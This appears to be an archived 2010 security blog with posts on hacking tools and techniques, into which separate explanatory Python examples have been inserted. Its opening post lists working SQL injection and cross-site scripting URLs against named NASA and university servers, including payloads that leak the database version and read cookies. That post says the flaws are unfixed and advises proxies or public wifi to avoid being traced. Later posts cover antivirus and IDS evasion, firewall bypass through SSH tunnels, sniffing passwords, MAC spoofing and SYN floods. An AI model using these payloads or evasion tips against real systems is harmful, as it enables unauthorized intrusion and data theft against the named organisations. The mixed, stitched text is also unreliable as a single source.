Thursday, February 25, 2010

NASA Servers "0-day" Vulnerabilities

After a series of SQL injection vulnerabilities last December 2009, the NASA website is in the security limelight again with another set of server vulnerabilities. I am aware that the agency itself has had budget issues lately, and the fact that it has a lot of servers to maintain on a daily basis may have contributed to such negligence. However, none of that should be used as an excuse for the security oversight. After all, prevention such as input validation and parameterized queries should not cost a single cent, right?



Cross-Site Scripting / SQL Injection:

http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=%27&node=0&instnname=0'AND+1/0;--&Submit=Search

The following error pages give away some precious information: the "Remote Address" field frequently shows a different IP address on each request. Those addresses may belong to other remote clients that triggered errors, which would point to a more serious flaw:

http://www-pds.jpl.nasa.gov/tools/search.jsp?q=NOT
http://www-pds.jpl.nasa.gov/tools/text-search/results.jsp?query=%22
http://www-pds.jpl.nasa.gov/tools/data-search/search.jsp?q=OR
http://www-pds.jpl.nasa.gov/tools/data-search/search.jsp?q=”
etc.

Check these results of this error-based SQL injection; the database error echoes the Sybase server version string back into the page:
http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=%27&node=1'%22;/*&instnname=-1;--&Submit=Search
http://www-pds.jpl.nasa.gov/tools/ddlookup/data_dictionary_lookup.cfm?type=element&q=NOT&genclasstype=0'&sysclassid=0

http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=&node=1&instnname=%27%29+OR+1=0+OR+57=rand%28convert%28%27NUMERIC,%27||%28select+@@version%29%29%252b900000000000000000000000%29--&Submit=Search
http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=&node=1&instnname=')+OR+1=0+OR+57=rand(convert('NUMERIC,'||(select+@@version))%252b900000000000000000000000)--&Submit=Search
————————————————————————————————————————————————–
Error Executing Database Query.
Syntax error during explicit conversion of VARCHAR value ' Adaptive Server Enterprise/12.5.1/EBF 11429/P/Linux Intel/Enterprise Linux/ase1251/1823/32-bit/OPT/Tue Sep 16 23:43:54 2003' to a NUMERIC field.

http://sbir.nasa.gov/sbirweb/abstracts/search_result.jsp?program=&phase=&progyr=99&st=&center=&firm='select+@@version--'&sort=&sort2=&rec_per_page=1&cur_page=-2&start_page=-9999

http://sbir.nasa.gov/sbirweb/abstracts/search_result.jsp?program=SBIR&phase=&progyr=99st=center=firm=SBIR'or+1=utl_inaddr.get_host_address((select+concat('A',count(username))+from+all_users))--'&sort=null&sort2=null&rec_per_page=100&cur_page=1&start_page=1
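The requests above all work the same way: a quote in a query-string parameter ends the string literal the server built around it, and whatever follows (a tautology, a comment marker, a type-conversion error that carries @@version) becomes part of the SQL. The following added example is not code from this page or from NASA; it uses an in-memory SQLite phonebook (constructed data, hypothetical table and column names) to show the vulnerable string-concatenation pattern the instnname payloads assume (a value wrapped in ('...')), the same lookup done with a bound parameter, and why a raw database error in the response is itself a leak:

```python
import sqlite3

# Constructed in-memory phonebook standing in for the site's database (not the page's code).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE phonebook (name TEXT, inst TEXT, phone TEXT)")
    conn.executemany(
        "INSERT INTO phonebook VALUES (?, ?, ?)",
        [("Alice", "JPL", "555-0100"), ("Bob", "GSFC", "555-0101"), ("Carol", "JPL", "555-0102")],
    )
    return conn

def lookup_vulnerable(conn, instname):
    # The user-supplied value is pasted straight into the SQL text inside ('...'),
    # which is the shape the instnname payloads above assume (they open with ') ).
    sql = "SELECT name, phone FROM phonebook WHERE inst IN ('%s') ORDER BY name" % instname
    return conn.execute(sql).fetchall()

def lookup_safe(conn, instname):
    # Bound parameter: the driver passes the value separately from the statement,
    # so quotes and comment markers inside it can never change the query structure.
    sql = "SELECT name, phone FROM phonebook WHERE inst IN (?) ORDER BY name"
    return conn.execute(sql, (instname,)).fetchall()

def error_message(conn, instname):
    # Error-based probing: a lone quote breaks the statement, and if the page shows
    # the raw database error, the attacker learns how the query is built.
    try:
        lookup_vulnerable(conn, instname)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None

# Same closing pattern as the phonebook.cfm payloads: close the quote and the
# parenthesis, add a tautology, comment out the rest.
TAUTOLOGY = "x') OR 1=1 --"

if __name__ == "__main__":
    db = make_db()
    print("normal        :", lookup_vulnerable(db, "GSFC"))
    print("injected      :", lookup_vulnerable(db, TAUTOLOGY))   # every row comes back
    print("parameterized :", lookup_safe(db, TAUTOLOGY))         # no rows: it is just a string
    print("error probe   :", error_message(db, "'"))
```

The fix for the ColdFusion pages listed above is the same idea: pass each parameter through a bound variable (cfqueryparam) instead of interpolating it into the query text, and return a generic error page so that conversion errors never carry database output to the client.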

http://e4eil01u.ecs.nasa.gov:22000/WebAccess/drill?attrib=home%3Cscript%3Ealert('XSS--vinnu')%3C/script%3E&next=group

http://www.igpp.ucla.edu/cgi-bin/ditdos?filter=GOPR_2001,HAL_,DS1_PEPE,DSPE&title=Comet
————————————————————————————————————————————————
http://directreadout.sci.gsfc.nasa.gov/index.cfm?section=home%22%3E%3Cscript%3Ealert('XSS--%5C%22vinnu%5C%22')%3C/script%3E&page=news
http://ssd.jpl.nasa.gov/sbdb_help.cgi?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


Safety Reminders :

1. The information above is for educational purposes only and should not be used for illegal purposes such as defacing, information theft, espionage, and the like.
2. Most of the vulnerabilities above have not yet been fixed by NASA, so take extra precautions if you have to check the live servers yourself, such as using multiple proxies or simply using public internet access such as a "wifi hotspot".
3. I tried to notify the people in charge via email before posting these vulnerabilities, but there has been no reply from them for two weeks now.
4. Credits to Lox and Vinay.

Monday, February 22, 2010

Metasploit Meterpreter Reverse EXE



The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.
The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
Metasploit was created in 2003 as a portable network tool written in the Perl scripting language. Later, the Metasploit Framework was completely rewritten in the Ruby programming language. It is most notable for releasing some of the most technically sophisticated exploits for public security vulnerabilities. In addition, it is a powerful tool for third-party security researchers to investigate potential vulnerabilities. On October 21, 2009 the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.
Like comparable commercial products such as Immunity's CANVAS or Core Security Technologies' Core Impact, Metasploit can be used to test the vulnerability of computer systems in order to protect them, and it can be used to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities.
Metasploit's emerging position as the de facto vulnerability development framework has led in recent times to the release of software vulnerability advisories often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk, and remediation of that particular bug. Metasploit 3.0 (Ruby language) is also beginning to include fuzzing tools, to discover software vulnerabilities in the first instance, rather than merely writing exploits for currently public bugs. This new avenue has been seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November, 2006.

Friday, February 19, 2010

Bypassing Anti-Virus Using Metasploit



This video shows how to bypass anti virus tools utilizing the new tricks in Metasploit 3.2

Monday, February 15, 2010

Fragroute



One basic technique is to split the attack payload into multiple small packets, so that the IDS must reassemble the packet stream before it can match the attack. A simple way of splitting packets is IP fragmentation, but an adversary can also simply craft TCP segments with small payloads. The 'whisker' evasion tool calls this 'session splicing'.
By themselves, small packets will not evade an IDS that reassembles the stream. However, they can be further manipulated to complicate reassembly and detection. One evasion technique is to pause between sending parts of the attack, hoping that the IDS's reassembly timer expires before the target's does. A second technique is to send the packets out of order, which confuses simple reassemblers that concatenate payloads in arrival order but not the target's TCP stack, which reorders by sequence number.
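An added example, not from the page or from the fragroute/whisker projects, that models the three tricks above against three detection strategies. The HTTP request and the signature string are constructed for illustration, and the "packets" are plain (sequence offset, arrival time, bytes) tuples; nothing is sent on the wire:

```python
# Constructed attack request and the signature an IDS might look for in it.
SIGNATURE = b"/cgi-bin/phf?"
ATTACK = b"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0\r\n\r\n"

def splice(payload, chunk_size, order="sequential", delay=0.0):
    """Session splicing: cut the payload into small segments.
    Returns (seq_offset, arrival_time, data) tuples in arrival order.
    order="reverse" sends them out of order; delay spaces them out in time."""
    chunks = [(off, payload[off:off + chunk_size]) for off in range(0, len(payload), chunk_size)]
    if order == "reverse":
        chunks.reverse()
    return [(off, i * delay, data) for i, (off, data) in enumerate(chunks)]

def per_packet_ids(segments, signature):
    """IDS that inspects each packet on its own: splitting the signature defeats it."""
    return any(signature in data for _, _, data in segments)

def arrival_order_ids(segments, signature):
    """Simple reassembler: concatenates payloads in the order they arrived."""
    stream = b"".join(data for _, _, data in sorted(segments, key=lambda s: s[1]))
    return signature in stream

def reassembling_ids(segments, signature, timeout=None):
    """Proper reassembler: orders by sequence offset, like the target's TCP stack.
    If the gap between two segments exceeds `timeout` seconds it discards its buffer,
    which is how a slow-dripped attack slips past an IDS with a short reassembly timer."""
    buffered, last_t = [], None
    for off, t, data in sorted(segments, key=lambda s: s[1]):
        if timeout is not None and last_t is not None and t - last_t > timeout:
            buffered = []
        buffered.append((off, data))
        last_t = t
    stream = b"".join(data for _, data in sorted(buffered))
    return signature in stream

def target_receives(segments):
    """The victim reorders by sequence number and keeps waiting, so it always sees the full request."""
    return b"".join(data for _, _, data in sorted(segments))

if __name__ == "__main__":
    for label, segs in [("4-byte chunks", splice(ATTACK, 4)),
                        ("reversed", splice(ATTACK, 4, order="reverse")),
                        ("30s apart", splice(ATTACK, 4, delay=30.0))]:
        print(label, "per-packet:", per_packet_ids(segs, SIGNATURE),
              "arrival-order:", arrival_order_ids(segs, SIGNATURE),
              "reassembly(10s timeout):", reassembling_ids(segs, SIGNATURE, timeout=10.0),
              "target sees attack:", SIGNATURE in target_receives(segs))
```

The practical lesson is the one the paragraph makes: an IDS must reassemble by sequence number and hold segments at least as long as the protected hosts do, otherwise each of these tricks leaves the target exploited and the sensor silent.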

Thursday, February 11, 2010

Hping



hping is a free packet generator and analyzer for the TCP/IP protocol suite, written and distributed by Salvatore Sanfilippo (also known as Antirez). hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to demonstrate the idle scan technique (also invented by the hping author), which is now implemented in the Nmap Security Scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string-based, human-readable descriptions of TCP/IP packets, so that the programmer can write scripts for low-level TCP/IP packet manipulation and analysis in a very short time.

Tuesday, February 9, 2010

NSA.gov Hacked : Epic Fail

I usually dislike and disagree with people who deface websites to state whatever point they want to prove, but this one is really an exception. The defacement happened last October 2009 and was kept quiet from the general public. This simply proves the poor state of IT security at supposedly one of the most security-knowledgeable agencies on the entire planet. How does this happen, you may ask? The security industry itself is filled with pretenders with fancy resumes and certifications who actually know next to nothing when it comes to real-world security threats. Otherwise, how do you explain being compromised with an 8-year-old exploit which any newbie hacker can readily use?

Monday, February 8, 2010

How Password Crackers Work



Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password against the stored hash. The purpose of password cracking might be to help a user recover a forgotten password (though setting an entirely new password is less of a security risk, it requires system administration privileges), to gain unauthorized access to a system, or as a preventive measure by system administrators to check for easily crackable passwords. On a file-by-file basis, password cracking is used to gain access to digital evidence for which a judge has allowed access but the particular file's access is restricted.
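An added example, not from the page, of the "repeatedly try guesses" loop: a dictionary attack with a small rule engine (capitalization, appended digits, reversal) against a constructed password file. The users, salts, passwords and wordlist are all made up here; the hash is PBKDF2-HMAC-SHA256 from Python's standard library, which also shows why the iteration count matters, since every guess costs the attacker the same work it costs the server:

```python
import hashlib

def hash_password(password, salt, iterations=1000):
    """Salted, iterated hash (PBKDF2-HMAC-SHA256), the kind a password store should use."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()

def mutations(word):
    """Simple rule engine: the variations a cracker tries for every wordlist entry."""
    seen = set()
    for cand in (word, word.capitalize(), word.upper(), word + "1", word + "123",
                 word.capitalize() + "1", word.capitalize() + "!", word[::-1]):
        if cand not in seen:
            seen.add(cand)
            yield cand

def crack(entries, wordlist, iterations=1000):
    """Dictionary attack over (user, salt, digest) entries.
    Returns ({user: recovered password}, number of hashes computed)."""
    found, attempts = {}, 0
    for user, salt, digest in entries:
        for word in wordlist:
            for cand in mutations(word):
                attempts += 1
                if hash_password(cand, salt, iterations) == digest:
                    found[user] = cand
                    break
            if user in found:
                break
    return found, attempts

# Constructed "shadow file": three users with fixed salts and hashes of known passwords.
# Per-user salts mean each user's hash has to be attacked separately (no shared table).
SALTS = {"alice": b"\x01" * 8, "bob": b"\x02" * 8, "carol": b"\x03" * 8}
ENTRIES = [
    ("alice", SALTS["alice"], hash_password("Password1", SALTS["alice"])),
    ("bob",   SALTS["bob"],   hash_password("nogard", SALTS["bob"])),      # "dragon" reversed
    ("carol", SALTS["carol"], hash_password("xK9#v2!pLq@7mZ", SALTS["carol"])),
]
WORDLIST = ["letmein", "password", "dragon", "qwerty", "nasa", "monkey"]

if __name__ == "__main__":
    recovered, attempts = crack(ENTRIES, WORDLIST)
    print("recovered:", recovered, "after", attempts, "hashes")
    print("not recovered:", [u for u, _, _ in ENTRIES if u not in recovered])
```

Carol's random password survives because no rule applied to any wordlist entry produces it; the attacker's only option there is exhaustive search, and each PBKDF2 iteration multiplies that cost.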

Sunday, February 7, 2010

Bypassing Firewalls Using SSH Tunneling



An SSH tunnel consists of an encrypted tunnel created through an SSH protocol connection. Users may set up SSH tunnels to tunnel unencrypted traffic over a network through an encrypted channel. For example, Windows machines can share files using the SMB protocol, a non-encrypted protocol. If one were to mount a Microsoft Windows file-system remotely through the Internet, someone snooping on the connection could see transferred files. To mount the Windows file-system securely, one can establish an SSH tunnel that routes all SMB traffic to the remote fileserver through an encrypted channel. Even though the SMB protocol itself contains no encryption, the encrypted SSH channel through which it travels offers security.
To set up an SSH tunnel, one configures an SSH client to forward a specified local port to a port on the remote machine. Once the SSH tunnel has been established, the user can connect to the specified local port to access the network service. The local port need not have the same port number as the remote port.
SSH tunnels provide a means to bypass firewalls that prohibit certain Internet services, so long as the site allows outgoing SSH connections. For example, an organization may prohibit users from accessing Internet web pages (port 80) directly without passing through the organization's proxy filter (which gives the organization a means of monitoring and controlling what users see on the web). But users may not wish to have their web traffic monitored or blocked by the organization's proxy filter. If users can connect to an external SSH server, they can create an SSH tunnel that forwards a given port on their local machine to port 80 on a remote web server. To access the remote web server, users would point their browser at http://localhost/ (or http://localhost:PORT/ if the chosen local port is not 80).
Some SSH clients support dynamic port forwarding that allows the user to create a SOCKS 4/5 proxy. In this case users can configure their applications to use their local SOCKS proxy server. This gives more flexibility than creating an SSH tunnel to a single port as previously described. SOCKS can free the user from the limitations of connecting only to a predefined remote port and server.
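The following added example is not code from this page or from OpenSSH; it is the plumbing that `ssh -L` sets up, written with Python's standard sockets so it can run offline: a listener on a local port relays every connection to a remote host and port, and the local and remote port numbers are independent. The encrypted hop through the SSH server is omitted (the forwarder connects to the service directly), and the "remote service" is a constructed echo server that upper-cases what it receives so that the round trip is visible:

```python
import socket
import threading

def _pump(src, dst):
    """Copy bytes one way until EOF, then pass the half-close along."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass

def start_forwarder(local_port, remote_host, remote_port):
    """Listen on 127.0.0.1:local_port and relay each connection to remote_host:remote_port.
    This is what `ssh -L local_port:remote_host:remote_port sshserver` does on the client
    side, minus the encrypted leg to sshserver. Port 0 lets the OS pick a free local port.
    Returns the listening socket so the caller can read the port and close it."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", local_port))
    listener.listen(5)

    def serve():
        while True:
            try:
                client, _ = listener.accept()
            except OSError:
                return                                  # listener closed
            upstream = socket.create_connection((remote_host, remote_port))
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return listener

def start_echo_server():
    """Constructed stand-in for the remote service (a web server, an SMB share, ...)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                buf = b""
                while True:
                    chunk = conn.recv(4096)
                    if not chunk:
                        break
                    buf += chunk
                conn.sendall(buf.upper())

    threading.Thread(target=serve, daemon=True).start()
    return srv

def send_through(local_port, message):
    """What the user's application does: talk to localhost, reach the remote service."""
    with socket.create_connection(("127.0.0.1", local_port)) as s:
        s.sendall(message)
        s.shutdown(socket.SHUT_WR)
        reply = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                return reply
            reply += chunk

def demo(message=b"GET / HTTP/1.0\r\n\r\n"):
    """Bring up the service and the forwarder, send one message through, tear down."""
    remote = start_echo_server()
    tunnel = start_forwarder(0, "127.0.0.1", remote.getsockname()[1])
    try:
        return send_through(tunnel.getsockname()[1], message)
    finally:
        tunnel.close()
        remote.close()

if __name__ == "__main__":
    print(demo(b"hello through the tunnel"))
```

From the firewall's point of view, all of this traffic is one outbound SSH session; that is exactly why egress policy has to decide whether outbound SSH to arbitrary hosts is acceptable at all.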

Saturday, February 6, 2010

Top Ten Web Hacking Techniques of 2008

Top Ten Hacks of 2007

Hacking Intranet Websites from the Outside


Cybercrime in the Middle East on the rise

Beirut (RPN) - Data protection and IT security is of increasing concern in the Middle East, where current research reveals an alarming upswing in cybercrime, with Saudi Arabia, the UAE, and Egypt topping the list as the most vulnerable to malicious internet attacks.
Internet security experts have classified the MENA region as one of the most vulnerable in the world to internet crime.  As one of the world’s fastest growing economic hubs and a region where business activity is characterized by an explosion of corporate data, protecting sensitive information is becoming a vital concern from legal, financial, and economic perspectives. 
Johnny Karam is the MENA region director for Symantec, an internet security firm.  In an interview with RPN, he emphasized the growing threats presented by the increasingly sophisticated activity of cybercriminals. 
"Cybercrime is certainly on the rise in the MENA region, and has spawned an underground economy, so to speak, where the goods traded include credit card information, active bank account details, and full-blown identities,” Karam said. 
This is an organized environment, where specialists are recruited for their ability to hack or phish for information.   Depending on its country of origin and other specifics, full credit card details – including acct number, full name, expiry date and security code, might sell for between 1 and ten dollars.  Full active bank account information can be purchased for as little as ten dollars.
Symantec’s research for 2008 ranked Egypt the most vulnerable of 230 countries sampled in terms of vulnerability to malicious acts, including virus transmission, hacking, spamming, and phishing.  Lebanon ranked 93. 
But Karam warns against the assumption that malicious activity originates only from outside the business being targeted, emphasizing a link between tough economic conditions and the upswing in cybercrime:
"With the difficult economic climate, many businesses are looking at the need to downsize.  They face the risk of information diversion as staff is downsized.  Confidential data may be diverted, either intentionally, or unintentionally.  The direct financial losses can be huge, as can the loss to a company’s brand name its customer list, or its advantage over competitors,” he explains.

Read more at : http://www.rpnnews.com/Story.aspx?StoryID=2046

Intrusion Detection Definitions



Firewall and Perimeter Security

US bill seeks cybersecurity scholarships : Send your kid to hacker school

The US House of Representatives has overwhelmingly passed a bill that would direct almost $400m toward research designed to shore up the nation's cyber security defenses.
The Cybersecurity Enhancement Act would authorize $108.7m over five years to establish a cybersecurity scholarship program. In return, students would serve in federal government posts upon graduation.


Read More at http://www.theregister.co.uk/2010/02/04/house_cybersecurity_bill/

Thursday, February 4, 2010

Data Mining Using Wireshark



Data mining is the process of extracting patterns from data. Data mining is becoming an increasingly important tool to transform these data into information. It is commonly used in a wide range of profiling practices, such as marketing, surveillance, fraud detection and scientific discovery.
Data mining can be used to uncover patterns in data but is often carried out only on samples of data. The mining process will be ineffective if the samples are not a good representation of the larger body of data. Data mining cannot show up patterns that may be present in the larger body of data if those patterns are not present in the sample being "mined". Inability to find patterns may become a cause for some disputes between customers and service providers. Therefore data mining is not fool proof but may be useful if sufficiently representative data samples are collected. The discovery of a particular pattern in a particular set of data does not necessarily mean that a pattern is found elsewhere in the larger data from which that sample was drawn. An important part of the process is the verification and validation of patterns on other samples of data.
The term data mining has also been used to describe data dredging and data snooping. However, dredging and snooping can be (and sometimes are) used as exploratory tools when developing and clarifying hypotheses.

Cookies and Grabbing Passwords with Wireshark



In this post, I will take you a little deeper and introduce the process of grabbing cookies and passwords using Wireshark. As already known, Wireshark is a network packet analyzer which can be used to capture and analyze the packets passing through a network interface. This includes cookies and passwords passing through the network interface card. In short, as HTTP is a stateless protocol, cookies are one of the ways used to maintain browser state. Once a cookie has been set for a domain and a specific path, it is echoed back in every subsequent request to that domain and path combination.
1.) Start Wireshark, begin capturing, and apply the display filter http.
2.) In order to set a cookie, navigate to http://httprecipes.com/1/2/cookies.php and click on the link "Set Cookie". You will be asked to enter a value for the cookie. Enter "pinoysecurity" (without quotes) and press Set. This will set the cookie test-cookie with the value "pinoysecurity".
3.) In Wireshark, select the appropriate row with data to and from the domain httprecipes.com. Look for Set-Cookie under Hypertext Transfer Protocol in the packet details.
4.) Passwords passed in cleartext (HTTP form posts, Basic authentication) can be grabbed just as easily with Wireshark.
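An added example, not from the page, that does by hand what you would read off the packet details in steps 3 and 4: parse captured HTTP messages and pull out Set-Cookie and Cookie headers, Basic-auth credentials and form fields that look like passwords. The three messages are constructed here to resemble the exercise (a login POST, the Set-Cookie response, and a later request that replays the cookie); they are not a real capture:

```python
import base64
from urllib.parse import parse_qs

# Constructed HTTP messages, as Wireshark's "Follow TCP Stream" would show them.
CAPTURE = [
    b"POST /login HTTP/1.1\r\nHost: www.example.test\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 30\r\n\r\n"
    b"username=alice&password=s3cret",
    b"HTTP/1.1 200 OK\r\nSet-Cookie: test-cookie=pinoysecurity; Path=/1/2\r\n"
    b"Set-Cookie: PHPSESSID=0123abcd; HttpOnly\r\nContent-Length: 0\r\n\r\n",
    b"GET /admin HTTP/1.1\r\nHost: www.example.test\r\n"
    b"Authorization: Basic Ym9iOmh1bnRlcjI=\r\nCookie: PHPSESSID=0123abcd\r\n\r\n",
]

def parse_http(raw):
    """Split one HTTP message into (start line, [(header, value), ...], body).
    Headers are kept as a list because Set-Cookie may legitimately repeat."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body

def extract_secrets(messages):
    """Return (kind, value) findings: cookies set/sent, Basic credentials, form passwords."""
    findings = []
    for raw in messages:
        start, headers, body = parse_http(raw)
        is_response = start.startswith("HTTP/")
        content_type = dict(headers).get("content-type", "")
        for name, value in headers:
            if is_response and name == "set-cookie":
                findings.append(("cookie set", value.split(";", 1)[0]))   # drop attributes
            elif not is_response and name == "cookie":
                findings.append(("cookie sent", value))
            elif name == "authorization" and value.lower().startswith("basic "):
                creds = base64.b64decode(value.split(None, 1)[1]).decode("latin-1")
                findings.append(("basic auth", creds))                     # user:password
        if not is_response and content_type.startswith("application/x-www-form-urlencoded"):
            for field, values in parse_qs(body.decode("latin-1")).items():
                if "pass" in field.lower() or "pwd" in field.lower():
                    findings.append(("form password", "%s=%s" % (field, values[0])))
    return findings

if __name__ == "__main__":
    for kind, value in extract_secrets(CAPTURE):
        print("%-14s %s" % (kind, value))
```

Everything this recovers is visible to anyone on the path only because the exchange is plain HTTP; the same session over HTTPS shows Wireshark nothing but TLS records, which is the real countermeasure the exercise is meant to motivate.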

Introduction To Wireshark



Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.
Wireshark is cross-platform, using the GTK+ widget tool-kit to implement its user interface, and using pcap to capture packets; it runs on various Unix-like operating systems including Linux, Mac OS X, BSD, and Solaris, and on Microsoft Windows. Released under the terms of the GNU General Public License, Wireshark is free software.

How To Spoof Your MAC Address



MAC spoofing is the technique of changing the assigned Media Access Control (MAC) address of a network interface to a different one. Changing the MAC address may allow an attacker to bypass MAC-based access control lists on servers, switches or routers, either hiding a computer on a network or allowing it to impersonate another computer.
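An added example, not from the page, covering the two details that bite in practice: the address you pick must be a unicast, locally administered one (first octet with the I/G bit clear and the U/L bit set, otherwise some drivers and switches reject it), and the change is made with the OS's own tools. The helper below parses and normalizes addresses, rewrites the first octet correctly, and prints the commands (`ip link` on Linux, `ifconfig ... ether` on macOS); the interface name eth0 and the sample addresses are assumptions:

```python
import random

def parse_mac(text):
    """Accept aa:bb:cc:dd:ee:ff, aa-bb-cc-dd-ee-ff or aabb.ccdd.eeff; return 6 bytes."""
    hexdigits = "".join(ch for ch in text if ch not in ":-.")
    if len(hexdigits) != 12:
        raise ValueError("MAC must have 12 hex digits: %r" % text)
    return bytes.fromhex(hexdigits)

def format_mac(mac):
    return ":".join("%02x" % b for b in mac)

def is_unicast(mac):
    return mac[0] & 0x01 == 0           # I/G bit (lowest bit of first octet) clear

def is_locally_administered(mac):
    return mac[0] & 0x02 != 0           # U/L bit set: not a vendor-assigned OUI

def make_spoofable(mac):
    """Rewrite the first octet so the address is locally administered and unicast."""
    first = (mac[0] | 0x02) & ~0x01 & 0xFF
    return bytes([first]) + mac[1:]

def random_local_mac(seed=None):
    """A fresh random address with the right first-octet bits (seed only for reproducibility)."""
    rng = random.Random(seed)
    return make_spoofable(bytes(rng.randrange(256) for _ in range(6)))

def spoof_commands(iface, mac, system="linux"):
    """Commands an administrator runs to apply the address. Most Linux drivers require
    the interface to be down while the address changes, hence the down/up pair."""
    addr = format_mac(mac)
    if system == "linux":
        return ["ip link set dev %s down" % iface,
                "ip link set dev %s address %s" % (iface, addr),
                "ip link set dev %s up" % iface]
    if system == "macos":
        return ["ifconfig %s ether %s" % (iface, addr)]
    raise ValueError("unsupported system: %r" % system)

if __name__ == "__main__":
    target = parse_mac("00:1A:2B:3C:4D:5E")          # assumed address to impersonate
    print("as given :", format_mac(target), "locally administered:", is_locally_administered(target))
    chosen = make_spoofable(target)
    print("to apply :", format_mac(chosen))
    for cmd in spoof_commands("eth0", chosen):
        print("  sudo", cmd)
    print("random   :", format_mac(random_local_mac()))
```

Note that make_spoofable() on a vendor address changes its first octet (00 becomes 02), so when the goal is to impersonate a specific host exactly you apply its address unchanged; the helper is for picking an address of your own that the stack and the switch will accept.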

SYN Flood - Denial of Service




A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system.
When a client attempts to start a TCP connection to a server, the client and server exchange a series of messages which normally runs like this:
  1. The client requests a connection by sending a SYN (synchronize) message to the server.
  2. The server acknowledges this request by sending SYN-ACK back to the client.
  3. The client responds with an ACK, and the connection is established.
This is called the TCP three-way handshake, and is the foundation for every connection established using the TCP protocol.
The SYN flood is a well-known type of attack and, in its original form, is generally not effective against modern systems. It works if a server allocates resources after receiving a SYN, but before it has received the ACK.
There are two methods, but both involve the server not receiving the ACK. A malicious client can skip sending this last ACK message. Or by spoofing the source IP address in the SYN, it makes the server send the SYN-ACK to the falsified IP address, and thus never receive the ACK. In both cases the server will wait for the acknowledgement for some time, as simple network congestion could also be the cause of the missing ACK.
If these half-open connections bind resources on the server, it may be possible to take up all these resources by flooding the server with SYN messages. Once all resources set aside for half-open connections are reserved, no new connections (legitimate or not) can be made, resulting in denial of service. Some systems may malfunction badly or even crash if other operating system functions are starved of resources this way.
The technology often used in 1996 for allocating resources for half open TCP connections involved a queue which was often very short (e.g., 8 entries long) with each entry of the queue being removed upon a completed connection, or upon expiry (e.g., after 3 minutes). When the queue was full, further connections failed. With the examples above, all further connections would be prevented for 3 minutes by sending a total of 8 packets. A well-timed 8 packets every 3 minutes would prevent all further TCP connections from completing. This allowed for a Denial of Service attack with very minimal traffic.
SYN cookies protect against the SYN flood by not allocating any per-connection state until the final ACK arrives: the server encodes the connection parameters into its initial sequence number and, when the ACK comes back, verifies that number instead of looking up a stored half-open entry.
Limiting new connections per source per time frame is not a general solution, since the attacker can spoof the packets to come from many sources.
Attackers can also use third-party hosts as reflectors instead of sending from client machines they control: SYNs sent with the victim's address as the spoofed source make those hosts send their SYN-ACKs to the victim.
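An added example, not from the page, that models the 1996-style backlog described above (8 slots, 3-minute expiry) and then the stateless alternative. The first part shows that 8 spoofed SYNs every 180 seconds are enough to lock a legitimate client out for the whole run, and that the attacker's timing has to track the server's expiry; the second part is a simplified SYN cookie (an HMAC over the 4-tuple and a coarse timestamp used as the initial sequence number) with the ACK check that replaces the queue. Addresses, ports and the secret are constructed:

```python
import hashlib
import hmac

class HalfOpenQueue:
    """Fixed-size backlog: a slot is held from SYN until the final ACK or until it expires."""
    def __init__(self, size=8, ttl=180):
        self.size, self.ttl = size, ttl
        self.pending = {}                        # (src_ip, src_port) -> expiry time

    def _expire(self, now):
        self.pending = {k: exp for k, exp in self.pending.items() if exp > now}

    def syn(self, client, now):
        """True if a slot was allocated (SYN-ACK sent), False if the SYN was dropped."""
        self._expire(now)
        if client in self.pending:
            return True
        if len(self.pending) >= self.size:
            return False
        self.pending[client] = now + self.ttl
        return True

    def ack(self, client, now):
        """Final ACK: connection established, slot freed."""
        self._expire(now)
        return self.pending.pop(client, None) is not None

def run_scenario(ttl=180, interval=180, horizon=540, step=10):
    """Attacker sends 8 spoofed SYNs every `interval` seconds; a legitimate client
    tries every `step` seconds. Returns the list of the client's outcomes."""
    q = HalfOpenQueue(size=8, ttl=ttl)
    outcomes = []
    for now in range(0, horizon + 1, step):
        if now % interval == 0:
            for i in range(8):                   # spoofed sources: the SYN-ACKs go nowhere
                q.syn(("203.0.113.%d" % i, 40000 + i), now)
        legit = ("192.0.2.7", 50000 + now)
        ok = q.syn(legit, now)
        if ok:
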